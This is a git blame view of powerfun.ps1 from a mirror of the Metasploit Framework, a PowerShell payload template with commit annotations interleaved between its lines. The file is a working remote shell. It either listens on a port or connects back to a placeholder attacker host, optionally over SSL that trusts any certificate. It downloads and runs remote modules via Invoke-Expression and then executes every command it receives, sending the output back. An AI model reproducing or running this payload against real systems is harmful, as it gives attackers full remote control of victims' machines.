infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/data/exploits/powershell/powerfun.ps1

75 lines
2.3 KiB
PowerShell
Raw Normal View History

updates to author comments in powershell script
2015-04-25 07:47:17 +00:00
# Powerfun - Written by Ben Turner & Dave Hardy
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
$wc.UseDefaultCredentials = $true
$wc.Proxy.Credentials = $wc.Credentials
$wc
Move script out of module
2015-04-19 20:12:23 +00:00
}
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
function powerfun
{
Param(
SSL Support for Powershell Payloads
2015-05-10 20:45:59 +00:00
[String]$Command,
Fix spacinG
2015-05-11 08:04:03 +00:00
[String]$Sslcon,
[String]$Download
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
)
Process {
$modules = @(MODULES_REPLACE)
if ($Command -eq "bind")
{
$listener = [System.Net.Sockets.TcpListener]LPORT_REPLACE
$listener.start()
$client = $listener.AcceptTcpClient()
}
if ($Command -eq "reverse")
{
$client = New-Object System.Net.Sockets.TCPClient("LHOST_REPLACE",LPORT_REPLACE)
Create our own Rex connection to the endpoint Ensure powershell process closes when module completes Add a windows cmd interact payload
2015-04-19 22:38:41 +00:00
}
SSL Support for Powershell Payloads
2015-05-10 20:45:59 +00:00
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
$stream = $client.GetStream()
SSL Support for Powershell Payloads
2015-05-10 20:45:59 +00:00
if ($Sslcon -eq "true")
{
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient("LHOST_REPLACE")
$stream = $sslStream
}
new changes
2015-05-19 15:18:06 +00:00
[byte[]]$bytes = 0..20000|%{0}
SSL Support for Powershell Payloads
2015-05-10 20:45:59 +00:00
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
if ($Download -eq "true")
{
SSL Support for Powershell Payloads
2015-05-10 20:45:59 +00:00
$sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
ForEach ($module in $modules)
{
(Get-Webclient).DownloadString($module)|Invoke-Expression
SSL Support for Powershell Payloads
2015-05-10 20:45:59 +00:00
}
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
}
SSL Support for Powershell Payloads
2015-05-10 20:45:59 +00:00
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
SSL Support for Powershell Payloads
2015-05-10 20:45:59 +00:00
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
Move script out of module
2015-04-19 20:12:23 +00:00
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
Move script out of module
2015-04-19 20:12:23 +00:00
updates to include reverse and bind
2015-04-22 19:41:19 +00:00
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
$listener.Stop()
}
updates to author comments in powershell script
2015-04-25 07:47:17 +00:00
}